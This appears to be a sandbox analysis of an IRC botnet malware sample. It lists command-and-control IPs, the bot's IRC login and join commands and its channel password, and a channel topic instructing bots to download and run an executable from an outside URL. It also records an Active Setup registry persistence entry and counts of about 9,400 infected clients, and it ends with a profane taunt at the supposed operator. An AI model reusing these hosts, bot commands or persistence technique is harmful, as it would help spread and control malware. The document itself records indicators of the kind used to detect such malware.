Remote Host Port Number
193.242.108.49 80
69.10.48.106 80
76.73.58.215 5900
NICK VirUs-cpvpvowu
USER VirUs “” “fah” :
8Coded
8VirUs..
JOIN #5# Virus
PRIVMSG #5# :Success.
PONG :Secret.Virus.Gov
Now talking in #5#
Topic On: [ #5# ] [ !NAZELlol http://ogard.t35.com/NoVaC4.jpeg update.exe 1 ]
Topic By: [ TuX ]
Modes On: [ #5# ] [ +smntMu ]
PASS Virus
* The data identified by the following URLs was then requested from the remote web server:
o http://193.242.108.49/Dialer_Min/number.asp
o http://ogard.t35.com/NoVaC4.jpeg
Registry Modifications
* The following Registry Key was created:
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67KLN5J0-4OPM-61WE-KKX2-4217QWE23218}
* The newly created Registry Value is:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67KLN5J0-4OPM-61WE-KKX2-4217QWE23218}]
+ StubPath = “c:BohaElsabahboh.exe”
so that boh.exe runs every time Windows starts
* The following directories were created:
o c:Boha
o c:BohaElsabah
ogard u arab lamer i heard u spend 2 years of your fucking life spreading this shit around now is time to end up
in chanel #5# around 8923 bots
Invisible Users: 9436
Channels: 8 channels formed
Clients: I have 9437 clients and 0 servers
Local users: Current Local Users: 9437 Max: 21072
Global users: Current Global Users: 9437 Max: 21072